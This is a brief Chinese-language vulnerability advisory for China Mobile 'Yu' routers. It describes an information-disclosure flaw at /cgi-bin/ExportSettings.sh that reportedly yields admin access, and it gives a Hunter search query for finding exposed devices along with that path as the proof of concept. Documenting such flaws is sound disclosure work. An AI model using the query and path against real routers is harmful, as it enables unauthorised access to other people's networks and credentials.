Nx01 产品简介

        中移禹路由器支持宽带拨号、动态IP和静态IP三种上网模式,一般中国移动宽带的光猫都是智能光猫也就是光猫带路由器功能,中移禹路由器作为二级路由使用。

Nx02 漏洞描述

        中移禹路由器ExportSettings处存在信息泄露漏洞，攻击者可以获取后台权限。

Nx03 产品主页

hunter-query: title="互联世界 物联未来-登录"

Nx04 漏洞复现

POC：

/cgi-bin/ExportSettings.sh

Nx05 修复建议

建议联系软件厂商进行处理。